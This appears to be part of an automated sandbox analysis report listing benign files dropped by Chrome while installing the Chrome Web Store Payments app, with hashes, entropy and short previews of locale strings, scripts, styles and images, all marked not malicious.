SSDEEP:	12:1HEJGcyvmbZGGGcyvmbZ+WYpU34OBOEtf+dgca1ZO8ZpU34GcQArERff03OyZnLh:1HE4cyY4TcyY8WYpNoWa1w8ZpQcQ6AfK
MD5:	3943FA2A647AECEDFD685408B27139EE
SHA1:	0129DD19D28373359530B3B477FE8A9279DABB7D
SHA-256:	18AFF072EE0DF7C3495045435C752A805606E6D5D462EF2321C443F1773F4B3A
SHA-512:	42E62B3855611FF2E1D39C11404CB1A09825EE4CA6A8ACB3FF538B4574388F549E3BD79137DD4DC128A8DC44DD270D7D878E4AAD20DA8250A5C25297B0DEC09D
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Pla.ila v spletni trgovini Chrome".. },.. "app_name": {.. "message": "Pla.ila v spletni trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenutno ni na voljo.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se z omre.jem.".. },.. "iap_unavailable": {.. "message": "Pla.ila v aplikacijah trenutno niso na voljo.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se v Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\sr\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	743
Entropy (8bit):	4.913927107235852
Encrypted:	false
SSDEEP:	12:1HEJssbdOGGssbdO+WYpU347xBP+dgcucO8ZpU34s1muP03OyZnLAOfTYzDYD:1HEKsb59sbTWYplx4Xud8Zpy1mNOGAOv
MD5:	D485DF17F085B6A37125694F85646FD0
SHA1:	24D51D8642CDC6EFD5D8D7A4430232D8CDE25108
SHA-256:	7FFDE34C58E7C376C042DE64DEF6481DAE32BE8B70F0B18EDF536290CBE0C818
SHA-512:	0DDECFD860E99290B6C3AAA04F510272AE081CF2D93ED5832D9D6378EC9D36177FFBE213471247FB94721EA34A83E7665669200047091D0FDE134E3D763217E7
Malicious:	false
Preview:	{.. "app_description": {.. "message": "....... . Chrome ...-..........".. },.. "app_name": {.. "message": "....... . Chrome ...-..........".. },.. "craw_app_unavailable": {.. "message": ".......... .. ........ ...........".. },.. "craw_connect_to_network": {.. "message": "........ .. .......".. },.. "iap_unavailable": {.. "message": "....... . .......... .. ........ ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "......... .. . Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\sv\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	630
Entropy (8bit):	4.52964089437422
Encrypted:	false
SSDEEP:	12:1HEJJMkbGGJMkb+WYpU34OACwz+dgNPGFZO8ZpU34JgpXLSb03OyZnLAOfTYLdID:1HErMkaqMk6WYpTOcb8ZpDgdZOGAOf8Y
MD5:	D372B8204EB743E16F45C7CBD3CAAF37
SHA1:	C96C57219D292B01016B37DCF82E7C79AD0DD1E8
SHA-256:	B8BA77E0089B0676545EC16D32468B727812B444F90B33A7A5B748E6C36C4388
SHA-512:	33640529E0D5DCC5CA4BDB0615A2818E8D26C6FCB7B3474C08AC3EB67B9DB40E1F0A79954ED20728CD47A686D2533DCBC76ABCBDB917F8530C8DE8BBA687352E
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Betalning via Chrome Web Store".. },.. "app_name": {.. "message": "Betalning via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Appen .r inte tillg.nglig f.r tillf.llet.".. },.. "craw_connect_to_network": {.. "message": "Anslut till ett n.tverk.".. },.. "iap_unavailable": {.. "message": "Betalning i appen .r inte tillg.ngligt f.r n.rvarande.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Logga in i Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\th\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	945
Entropy (8bit):	4.801079428724355
Encrypted:	false
SSDEEP:	24:1HEKa1dDa1/WYp6UFi72SmlG8ZpyactrW2SAOGAOfvSLD:WK2DNYp6U4y3bpyLxwGFW
MD5:	83E2D1E97791A4B2C5C69926EFB629C9
SHA1:	429600425CB0F196DDD717F940E94DBD8BFF2837
SHA-256:	2FECA577F43D97BAEEA464741D585892103585208FD0A935B810A03BDCE83C88
SHA-512:	60A5928DAA8CB4341487F477C56B5A98B83EDE50E5F4F55A802E01FDDAB86F3E795D391953D3D9214552D14D3F58C5A183693C613720FC12FC387D7B8F9B9AB6
Malicious:	false
Preview:	{.. "app_description": {.. "message": "............... Chrome .........".. },.. "app_name": {.. "message": "............... Chrome .........".. },.. "craw_app_unavailable": {.. "message": ".............................".. },.. "craw_connect_to_network": {.. "message": ".........................".. },.. "iap_unavailable": {.. "message": "...............................................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "................. Chrome".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\tr\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	631
Entropy (8bit):	4.710869622361971
Encrypted:	false
SSDEEP:	12:1HEJ9Y8GG9Y8+WYpU34wWT+dgGb0GO8ZpU34wryd7T03OyZnLAOfTYGbPKG:1HE0jWYpyRnG8Zpyr/OGAOfFPn
MD5:	2CEAE0567B6BB1D240BBAD690A98CA3B
SHA1:	5944346FBD4A0797B13223895995CAB58E9ECD23
SHA-256:	A7CB86F30C9C31FE5540282C308BA96ADB4EC16EF98C87129EB88105E5BEF5FC
SHA-512:	108A07C6D03D7178E8D0FFEF5349E0249A898D864964FED8757BD8A08BC1C6D9613F2A6C01AA34A6606127D1C6CE14C229FA02586677DBB060B85E3E845950E1
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome Web Ma.azas. .demeleri".. },.. "app_name": {.. "message": "Chrome Web Ma.azas. .demeleri".. },.. "craw_app_unavailable": {.. "message": "Uygulama .u anda kullan.lam.yor.".. },.. "craw_connect_to_network": {.. "message": "L.tfen bir a.a ba.lan.n.".. },.. "iap_unavailable": {.. "message": "Uygulama ..i .demeler .u anda kullan.lamaz.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "L.tfen Chrome'da oturum a..n.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\uk\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	720
Entropy (8bit):	4.977397623063544
Encrypted:	false
SSDEEP:	12:1HEJ7wILkSlXZGG7wILkSlXZ+WYpU34zb1Oy2P+dgSV1EjiTO8ZpU347qtfP2CTW:1HElwEkK4uwEkK8WYpd/dTV1e8Zptq5S
MD5:	AB0B56120E6B38C42CC3612BE948EF50
SHA1:	8B3F520E5713D9F116D68E71DAEED1F6E8D74629
SHA-256:	68ABA284751EB9C856032062EF9B1651E2A1E5CE5FDA0977FFC97D63BA7BED9E
SHA-512:	CD852A58217F739C1CD58567FF432D31A7AD3F68C884ABBA1DA95799BCD1545C6A5D3B06F319681C12B78AD0A709828DE4B22736316F148D21F5DB76A5BCCBEF
Malicious:	false
Preview:	{.. "app_description": {.. "message": "....... ...-........ Chrome".. },.. "app_name": {.. "message": "....... ...-........ Chrome".. },.. "craw_app_unavailable": {.. "message": "........ ......... ...........".. },.. "craw_connect_to_network": {.. "message": "............. .. .......".. },.. "iap_unavailable": {.. "message": "....... ..... ........ ..... .. .........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "........ . Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\vi\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	695
Entropy (8bit):	4.855375139026009
Encrypted:	false
SSDEEP:	12:1HEJMAZrSFZGGMAZrSFZ+WYpU34WFHoz+dgdklzoO8ZpU34NFHoz03OyZnLAOfTU:1HEI4B8WYpAKytFZ8ZpXKMOGAOfd6D
MD5:	7EBB677FEAD8557D3676505225A7249A
SHA1:	F161B4B6001AEAEAB246FF8987F4D992B48D47BE
SHA-256:	051F96ED874C11C4A13589B5F68964E4F5B03B52DDA223D56524F2CA23760C04
SHA-512:	74FD267CF7E299FB8E7054605C3F651F057F676FF865082FA24F4916755456768DB0DA62DBC515D829B48AB1F9CFC8AD3E841DCBF1F194D5CB14C5335A192A0D
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Thanh to.n tr.n c.a h.ng Chrome tr.c tuy.n".. },.. "app_name": {.. "message": "Thanh to.n tr.n c.a h.ng Chrome tr.c tuy.n".. },.. "craw_app_unavailable": {.. "message": ".ng d.ng hi.n kh.ng kh. d.ng.".. },.. "craw_connect_to_network": {.. "message": "Vui l.ng k.t n.i v.i m.ng.".. },.. "iap_unavailable": {.. "message": "Thanh to.n trong .ng d.ng hi.n kh.ng kh. d.ng.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Vui l.ng ..ng nh.p v.o Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\zh_CN\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	595
Entropy (8bit):	5.210259193489374
Encrypted:	false
SSDEEP:	12:1HEJ01GG01+WYpU34zeHz+dgfO8ZpU34YKiO03OyZnLAOfTYB6U:1HEpIWYpISv8Zp+JOGAOfa6U
MD5:	BB73BF561BB79F89D9BF7C67C5AE5C65
SHA1:	2FADD3A1959B29C44830033A35C637D0311A8C9C
SHA-256:	D804F2A040D21D7511EFD5213D8E1721D64964A1A0DBB48E21622CEEDC9D967E
SHA-512:	627D44CEF1FE5C5ABD598BD47FF5E22B9EFC1CF98DDE3868FA9E5896C134A0C9C055AC34EDDADAE56B6690E51AEA89965D38F770552A85C732CC796795DC68D2
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome .........".. },.. "app_name": {.. "message": "Chrome .........".. },.. "craw_app_unavailable": {.. "message": ".........".. },.. "craw_connect_to_network": {.. "message": ".......".. },.. "iap_unavailable": {.. "message": "............".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "... Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\zh_TW\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	634
Entropy (8bit):	5.386215984611281
Encrypted:	false
SSDEEP:	12:1HEJ2j62GG2j62+WYpU34m7T+dgc8nOO8ZpU34mvIO03OyZnLAOfTYAuH:1HEuSZCWYpsStwP8ZpROGAOfCH
MD5:	5FF50C673CC0C661D615F0CFD0E6DCA0
SHA1:	60DFF98DEAB9C4746B288BDD9C94B3BCAE5EAA85
SHA-256:	C6F8C640F3353A7B9B1432A0C139C1AEEC40133800E6C9B467B63991AD660308
SHA-512:	361D62D91F4931C5F34092C9F2C6A5323D5EEB82A24E7ABE11F7817D8D66341C0ECAD4DCB4B10873920C8D6A3CC9F5704889E178EB2549001A9F62BEDF6C8019
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome ............".. },.. "app_name": {.. "message": "Chrome ............".. },.. "craw_app_unavailable": {.. "message": ".............".. },.. "craw_connect_to_network": {.. "message": "......".. },.. "iap_unavailable": {.. "message": "................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "... Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_metadata\verified_contents.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	7780
Entropy (8bit):	5.791315351651491
Encrypted:	false
SSDEEP:	192:RktDNJ2UzsL5KcASyoH+CouKP/iNGRo/oRHMIT:AZQflcsU
MD5:	0834821960CB5C6E9D477AEF649CB2E4
SHA1:	7D25F027D7CEE9E94E9CBDEE1F9220C8D20A1588
SHA-256:	52A24FA2FB3BCB18D9D8571AE385C4A830FF98CE4C18384D40A84EA7F6BA7F69
SHA-512:	9AEAFC3ECE295678242D81D71804E370900A6D4C6A618C5A81CACD869B84346FEAC92189E01718A7BB5C8226E9BE88B063D2ECE7CB0C84F17BB1AF3C5B1A3FC4
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiZHUtdGRPdUNWcmxDY254Q0poRkg2NXpLU05vb1RiUE56bDNHbzdRMGJ3SSJ9LHsicGF0aCI6Il9sb2NhbGVzL2NhL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJ6ZGtWaF9XdkxJWlhkck5xWHBvSHNRMGh1ZGtSM2d1QlMzb2VsTEZLNklVIn0seyJwYXRoIjoiX2xvY2FsZXMvY3MvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6Ik9nUkNIZlVoam9xOU93NHFfaEhvTTQxNzNMelJyYkVpUVdsRXNRSzhscFkifSx7InBhdGgiOiJfbG9jYWxlcy9kYS9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiN2JVWW1LYkhQUUNRMXBGcmUzTHJySEhwWk9xN1c2Zk5hT0laWmdKUERTTSJ9LHsicGF0aCI6Il9sb2NhbGVzL2RlL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJOV3FkU3Rfc1NFMm9KT2VuSUZtM0pMRm9iOGtBZ3ZTa3RtZGpCRGJWazdBIn0seyJwYXRoIjoiX2xvY2FsZXMvZWwvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6ImgyaEZ0YUJoLXJQUEtoUm00QkFWM0VEZmhFbnh5MElGOVhYT3Z0aHhlNjAifSx7InBhdGgiOiJfbG9jYWxlcy9lbi9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoid0pSZDFmM3NxMERFVTJHLXd

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\craw_background.js Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	544643
Entropy (8bit):	5.385396177420207
Encrypted:	false
SSDEEP:	6144:abyfBNC2FRdjiRXqbe5Dq31IVlMqX+wd5/CcMMJcRULt0NjyTOEzZQ+h72W3GB0n:Ft/g
MD5:	6EEBED29E6A6301E92A9B8B347807F5F
SHA1:	65DFB69B650560551110B33DCBA50B25E5B876DE
SHA-256:	04CD9494B0ED83924DAD12202630B20D053D9E2819C8E826A386C814CC0A1697
SHA-512:	FEDE6DB31F2AD242E7BC7B52A8859BA7F466A0B920A8DADCB32DCFB5B2A2742E98B767FF22E0C5BC5C11FEC021240AA9E458486C9039EB4EBE5CF6AF7BE97BF2
Malicious:	false
Preview:	/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var d,e=e\|\|{};e.scope={};e.arrayIteratorImpl=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};e.arrayIterator=function(a){return{next:e.arrayIteratorImpl(a)}};e.ASSUME_ES5=!1;e.ASSUME_NO_NATIVE_MAP=!1;e.ASSUME_NO_NATIVE_SET=!1;e.SIMPLE_FROUND_POLYFILL=!1;e.ISOLATE_POLYFILLS=!1;e.FORCE_POLYFILL_PROMISE=!1;e.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.e.defineProperty=e.ASSUME_ES5\|\|"function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};e.getGlobal=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");};e.global=e.getGlobal(this);.e.IS_SYMBOL_NATIVE="func

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\craw_window.js Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	261316
Entropy (8bit):	5.444466092380538
Encrypted:	false
SSDEEP:	3072:I5vU7I6s2M9duIWFCbmYJ4tnFWdqpMad2vywhIp81QFv9F9nNsZgiDdOFlV/mZmc:I5vqFCb2p8Gx9FNNsZ9Dd/ceR
MD5:	1709B6F00A136241185161AA3DF46A06
SHA1:	33DA7D262FFED1A5C2D85B7390E9DBC830CBE494
SHA-256:	5721A4B3F8E09C869A629EFFD350B51C9D46F0AC136717D4DB6265C0EE6F9AC8
SHA-512:	26835B4C050F53AD2DDB84469DF9A84BBB2786A655AB52DFC20B54BEDCB81D1ECD789198D5B7D8B940242E5CEAC818A177444D402397AE82C203438C4B1D19CB
Malicious:	false
Preview:	/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var b,k=k\|\|{};k.scope={};k.createTemplateTagFirstArg=function(a){return a.raw=a};k.createTemplateTagFirstArgWithRaw=function(a,c){a.raw=c;return a};k.arrayIteratorImpl=function(a){var c=0;return function(){return c<a.length?{done:!1,value:a[c++]}:{done:!0}}};k.arrayIterator=function(a){return{next:k.arrayIteratorImpl(a)}};k.makeIterator=function(a){var c="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return c?c.call(a):k.arrayIterator(a)};.k.arrayFromIterator=function(a){for(var c,d=[];!(c=a.next()).done;)d.push(c.value);return d};k.arrayFromIterable=function(a){return a instanceof Array?a:k.arrayFromIterator(k.makeIterator(a))};k.ASSUME_ES5=!1;k.ASSUME_NO_NATIVE_MAP=!1;k.ASSUME_NO_NATIVE_SET=!1;k.SIMPLE_FROUND_POLYFILL=!1;k.ISOLATE_POLYFILLS=!1;k.FORCE_POLYFILL_PROMISE=!1;k.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.k.objectCreate=k.ASSUME_ES5\|\|"function"==typeof Object.cre

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\css\craw_window.css Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1741
Entropy (8bit):	4.912380256743454
Encrypted:	false
SSDEEP:	24:LalZ74H+rMwJHwIodHRmxt3jiu1iu1RDpfeWlMl548wJHwDwCapt/VMYXj8Eq27K:Z+rMm71le88S1tWYXmrVZFH
MD5:	67BF9AABE17541852F9DDFF8245096CD
SHA1:	A4AC74DD258E8E0689034FAA1B15A5C7C56DC3BB
SHA-256:	10DFBD2D98950B79EE12F6B8E3885AABE31543048DE56AD4FC0A5E34D0D9D4EC
SHA-512:	298FA132C6F122798FDB9BC6DE8024915147ADC20355B56A92F0ED9ACCE4549BE6E7F42212E07DCA166E31624D4E66E299565845D4BA1C51CA935050641B61FE
Malicious:	false
Preview:	html, body {. margin: 0;. overflow: hidden;.}..webview {. width: 100%;. height: 100%;. min-height: 100%;. position: absolute;.}...craw_overlay {. position: absolute;.. left: 0;. top: 0;. right: 0;. bottom: 0;.. background-color: white;.. -webkit-transition: opacity 250ms linear;.. display: -webkit-flex;. -webkit-flex-direction: column;. -webkit-flex: 1 0%;. -webkit-align-items: center;. -webkit-justify-content: center;.. -webkit-app-region: drag;.}...craw_overlay img {. margin: 16px;.}..#loading_overlay {. opacity: 1;.}..#offline_overlay {. opacity: 0;. display: none;.}..#offline_overlay > img {. -webkit-filter: saturate(0%);.}..#offline_overlay > span {. font-family: 'Open Sans', 'Deja Vu Sans', Arial, sans-serif;. font-size: 15px;. line-height: 21px;. color: #8d8d8d;. display: block;.}..#loading_splash {. width: 128px;. height: 128px;.}..#drag_overlay {. position: absolute;. left: 0;. top: 0;. right: 0;. bottom: 0;. pointer-events: none;. -webkit

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\html\craw_window.html Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	810
Entropy (8bit):	4.723481385335562
Encrypted:	false
SSDEEP:	12:hYenuEJIig5fRpvV4AEdN2sAAuzg/7RwQuLYpUH9KfRnQBGgZKy3QGgjPSWZDQL:hYeLJKTVNEuLAuzg/twQucpS9bj3
MD5:	34A839BC40DEBC746BBD181D9EF9310C
SHA1:	8B4EAA74D31EED5B0BABA3CA5460201F6B10DA46
SHA-256:	BB8742615E4CD996AE5D0200E443AE6A6F0B473255F03AFFDB8FB4660DE4554D
SHA-512:	EE81E5509CBC2CB2B6C834224688C1E1B1AA9AA3866C52F8EAED040D5C390653C52D8D681E2E2CF62906643962ABAC823D5B622385B983B21E0DCCAFDF281EFF
Malicious:	false
Preview:	<!DOCTYPE html>.<html>. <head>. <link href="/css/craw_window.css" rel="stylesheet">. <script src="/craw_window.js"></script>. </head>. <body>. <webview></webview>. <div class="craw_overlay" id="loading_overlay">. <img src="/images/icon_128.png" />. <img src="/images/flapper.gif" />. </div>. <div class="craw_overlay" id="offline_overlay">. <img src="/images/icon_128.png" />. <span id="app_unavailable"></span>. <span id="connect_to_network"></span>. </div>. <div id="drag_overlay"></div>. <div id="top_bar">. <div id='close_button'>. <img src='/images/topbar_floating_button_close.png'/>. </div>. <div id='maximize_button'>. <img src='/images/topbar_floating_button_maximize.png'/>. </div>. </div>. </body>.</html>.

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\images\flapper.gif Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 30 x 30
Category:	dropped
Size (bytes):	70364
Entropy (8bit):	7.119902236613185
Encrypted:	false
SSDEEP:	768:g5TXOSBAqNIPmA8NcjCWdM0VFMJEwavTeElfWupav5TXg7wV+irIPny9MTVQHydi:g5KSmiIPmAhZWiMsDfWug7DmqM6HybkF
MD5:	398ABB308EEBC355DA70BCE907B22E29
SHA1:	CFFB77B8A1724B8F81D98C6D6AD0071D10162252
SHA-256:	2B73533F47A99FFEA9CC405FFAFA9C4C53623F62487AEBFBA415945120B22040
SHA-512:	FC7A56FC8A61A582161874B54ADBAD30A84840190008EDB0B6FBF84F91393CA58E988E3FE446F11A0C3C691C18249B93AEC2904B3D0C4F0857D79034F662385A
Malicious:	false
Preview:	GIF89a.......................................................!.......!..NETSCAPE2.0.....,.............9.:.h0.bT(6.!l.&..("gk..JL1.[....o. .(:..B(.6."...Z.CUyh0.....j.C.z8..S....2.T'...Q..4 g\|]$ueW.NyQ.IoL!AoF#9h>7.0t..%..,.@.m4..7..!.......,.............9.:.h0.bT(6.!l.&..("gk..JL1.[....o. .(:..B(.6."...Z.CUyh0.....j.C.z8..S....2.T'...Q..4 g\|]$ueW.NyQ.IoL!AoF#9h>7.0t..%..,.@.m4..7..!.......,............................................................................................................'..w=.....\.)._6.k..OF...n.#\~"....2b3..I.)..eu.Q.`.e......gr.?>.s.I0.....@.~.Tr.[8.+.,.;..EE....S.*f.....,.....B8/D..;.9.q......ukC...r.I.....j......BGY...o2J....+O4....X4.....cH%7....I.....0H!.!.....!.,.............................................................................................................................................................................................................p8.a$....hh@.4....X,A.0L..(....JX.j...,..........z.X.Q....jB.d....B..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\images\icon_128.png Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4364
Entropy (8bit):	7.915848007375225
Encrypted:	false
SSDEEP:	96:YjlLDJjTvXUtNvX8dgb9HT6y8nviyHG5iCRYtIP:YtNTfUzvX8KM+MGRsIP
MD5:	4DBC9F9E6F5A08D299BAC9E54DF07694
SHA1:	BB38F5DE34B1E0BE1109220BA55271087A4D9EA5
SHA-256:	91C2718DD23B4356D71F88F6146868369033291086DF327534546DFA459BEB0E
SHA-512:	A5F2B1F47502836130D8083F757B7773C1E1CB36B76AD298CC29AB2B428C8002D2F15BD839838FC326DAC3681C2F48AB25A3E7631D33726C4B25E8EC14170912
Malicious:	false
Preview:	.PNG........IHDR..............>a.....IDATx..yp.....gF#.:,[H.l.l..8...`/.k....,!a7Km...E...Te..T.....J...p....%.(....+...3....eY.e...L.o...5....h4...\....{?....~.u.`0.....`0.....`0.....`.Y......[(.......).4....ai..w38.+....Bf././..]...{......8...3.....3W~OJ.. /...u6V.C..U.0.+._=.c..9.X.?....L....S@.L...m.0..>.C...L\|TF.p5..f4M.,.V....8..a.<...RP..@)E,..E"...h.....!...-....,I..T..........m..._[[{w{{....{.^......M.x..h4.h.....\.R.E....j).7.....h4.A.E....,. ...iii.Vj?2...=/.B.FK9P..@)=Rj..D".Y...2.B..x.}0...&J...2.......f.O..e.H.....!.J)'I..R....B............QJ;K..L...L.l".L~mhh.R.@).FFF~.L&...~.B.......u.........}.....~.....f..yUU...........^M...6......].,w.e..~.!$.C.R.....E(%e9.,....k..@...W8.........@...........O..@%.~..@.S..P.....`Tp...."...?ME..c......s...`..S1...7.b..aNE..k...3.yP.}.Ch.}......B..........IPE..C.<....T....k......Z..o_......g........P..A=y.J.)h..@.q.-.].AU.4...F.M.....y%B]+ .\.~..9......:..=...r.....E].o...F..P........i...\|....

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\images\icon_16.png Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	558
Entropy (8bit):	7.505638146035601
Encrypted:	false
SSDEEP:	12:6v/7vyVgSKYsfFzXxXsrPfA+b0YX+5IOUWCQKznuow7:6yVnKYsfFzhXsrIq0YXmgQGn6
MD5:	FB9C46EA81AD3E456D90D58697C12C06
SHA1:	5FC450F7D73CCFAC8F0D818CB3392BA4D91B69DE
SHA-256:	016CA659BA080E194FBFC0929602B16506ED60AA6019FAA51410C4FD93B583E8
SHA-512:	ADD810EE9EB7CAEC505B5FD90A1F184CE39D8F8C689DCC240F188FE353B9575489492E07D572A3B1C11A1555CE66AFCA5134903E4C1AA3D54BC7C5ED3E65B50C
Malicious:	false
Preview:	.PNG........IHDR................a....IDAT8...Mk.Q...;... .....F..QW.....F....J.?.w..7~......'.Q..B]... .QS...M&_w..b&.\|`......p...f.?.D$.y^..........y...\..Z..t6..oRj.@&.u..G.qN).t.-V.>(.N.Ep]wFk.60o.]0.`Y..cT..Y.Tb.`DF.d..s.Z..E..9.4._C.._...%..*.^....4.l...Y..X..R..../...Wj+w0[.].._B.k.${.\.>.%...........lz .w.ALxo.2;..a...".p..S..&..uXS...<..6..[..zD.._.N+w.WbM7ye6X<...'(,=.r}........$f..5..P....k..."..8.s.<zgSm@.....).Y.....:e..\|.....F...I..A$.....T?.....m....8.........N...z.....V..vd.h'....C.?.....H.;]..C.M.....9.b......IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\images\topbar_floating_button.png Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.475799237015411
Encrypted:	false
SSDEEP:	3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/RPJDmV7bScsP4a9zln94FptVp:6v/lhPKM4nDspnAkZJNmgPdln2TTp
MD5:	8803665A6328D23CC1014A7B0E9BE295
SHA1:	9DA6EE729D5A6E9F30658B8EC954710F107A641F
SHA-256:	D5F9234DC36E7FFA85F35B2359A4F82276F8395EFA76E4553507EA990B27FC6C
SHA-512:	ECD9E71B8BA1ED8BD4CA5A0936CB66A83611C4ABCBDA76C250F4CDF4AD80320212E8F5EEB79A38910718F8346ECC1AD580A3FA835EC2B22BE497F36899FB5930
Malicious:	false
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...Q..0......2...(p...~Z.}'.>I%O...V!s..................../...`.<..`.....IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\images\topbar_floating_button_close.png Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	252
Entropy (8bit):	6.512071394066515
